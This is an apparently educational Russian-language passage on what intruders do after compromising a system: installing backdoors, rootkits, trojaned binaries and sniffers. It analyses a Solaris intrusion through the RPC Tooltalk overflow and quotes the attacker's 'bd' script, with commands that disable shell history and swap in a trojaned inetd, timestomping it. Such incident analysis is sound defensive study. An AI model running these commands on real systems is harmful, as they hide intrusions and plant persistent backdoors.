Использование взломанных систем
После взлома системы хакер обычно помещает в нее «черный ход», использующийся вместе с инструментом rootkit, включающим версию системы с кодом «троянского коня» (позволяет скрыть присутствие хакера), через который он будет входить в систему в дальнейшем. Так же хакеры могут закрыть уязвимое место, через которое они проникли внутрь, чтобы никто больше не мог управлять «их системой». Хакеры копируют файлы с паролями других систем, чтобы поработать на досуге над их вскрытием, загружают программу-снифер для захвата паролей. После взлома система используется для атаки или для предварительного зондирования.

Реальные сценарии атак
Рассматриваемая система была взломана посредством переполнения буфера с помощью программы RPC Tooltalk для ОС Solaris. Был найден сценарий под названием bd, который загружался в систему.

unset HISTFILE; unset SAVEHIST

Хакер отключает файл журнала, чтобы его действия не фиксировались.

cp doc /usr/sbin/inetd;
chown root /usr/sbin/inetd;
chgrp root /usr/sbin/inetd;
touch 0716000097 /usr/sbin/inetd;